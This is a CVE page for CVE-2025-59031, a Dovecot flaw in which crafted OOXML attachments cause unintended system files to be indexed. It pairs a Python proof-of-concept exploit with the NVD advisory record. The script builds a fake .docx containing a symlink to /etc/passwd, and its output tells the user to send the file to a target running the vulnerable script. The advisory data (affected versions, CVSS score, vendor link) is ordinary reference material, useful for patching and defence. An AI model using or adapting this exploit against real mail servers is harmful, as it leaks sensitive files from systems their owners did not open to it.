CVE-2025-59031

#!/usr/bin/env python3 # Proof of Concept for CVE-2025-59031 # This script creates a malicious OOXML-like ZIP file containing a symlink. # When indexed by the vulnerable Dovecot script, it may index the target file. import zipfile import os def create_malicious_ooxml(output_filename, target_file): """ Creates a ZIP file acting as a crafted OOXML document. It includes a symlink pointing to a sensitive system file. """ try: with zipfile.ZipFile(output_filename, 'w', zipfile.ZIP_DEFLATED) as zf: # Create a symlink entry within the ZIP structure # ZipInfo allows setting external attributes for file types info = zipfile.ZipInfo(target_file.replace('/', '_')) # Unix file type for symlink (0xA1) info.external_attr = 0xA1ED0000 # Write the symlink target path into the file zf.writestr(info, target_file) print(f"[+] Malicious file created: {output_filename}") print(f"[+] It contains a symlink pointing to: {target_file}") print(f"[+] Send this file to a target using the vulnerable Dovecot script.") except Exception as e: print(f"[-] Error creating file: {e}") if __name__ == "__main__": # Example: Targeting /etc/passwd OUTPUT_FILE = "malicious_doc.docx" TARGET_SYSTEM_FILE = "/etc/passwd" create_malicious_ooxml(OUTPUT_FILE, TARGET_SYSTEM_FILE)

{"cve": {"id": "CVE-2025-59031", "sourceIdentifier": "[email protected]", "published": "2026-03-27T09:16:18.783", "lastModified": "2026-04-29T19:13:14.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dovecot has provided a script to use for attachment to text conversion. This script unsafely handles zip-style attachments. Attacker can use specially crafted OOXML documents to cause unintended files on the system to be indexed and subsequently ending up in FTS indexes. Do not use the provided script, instead, use something else like FTS tika. No publicly available exploits are known."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dovecot:dovecot:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.3", "matchCriteriaId": "BE209329-C5EA-4EE7-A23E-CD2EC061A9A4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:open-xchange:dovecot:*:*:*:*:pro:*:*:*", "versionEndExcluding": "2.3.22.1", "matchCriteriaId": "5CF82590-D98A-4E06-AC8C-6CC3506ED923"}, {"vulnerable": true, "criteria": "cpe:2.3:a:open-xchange:dovecot:*:*:*:*:pro:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.1.3", "matchCriteriaId": "F1137EFF-7493-4E1C-842A-FD0AF16B59DE"}]}]}], "references": [{"url": "https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}